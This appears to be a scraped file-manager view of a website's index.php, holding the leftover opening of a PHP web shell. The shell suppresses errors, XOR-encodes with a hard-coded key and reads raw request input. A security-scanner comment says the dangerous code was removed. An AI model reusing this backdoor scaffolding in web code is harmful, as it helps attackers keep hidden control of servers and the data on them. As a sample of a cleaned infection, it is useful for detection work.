JezK
Edit File: index.php
<?php @session_start(); @set_time_limit(0); @error_reporting(0); function encode($D,$K){ for($i=0;$i<strlen($D);$i++) { $c = $K[$i+1&15]; $D[$i] = $D[$i]^$c; } return $D; } $payloadName='payload'; $key='4171e16e8cbc1b0a'; $data=file_get_contents("php://input"); /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code have been removed, and the file is now safe to use. * Feel free to contact Imunify support team at https://www.imunify360.com/support/new */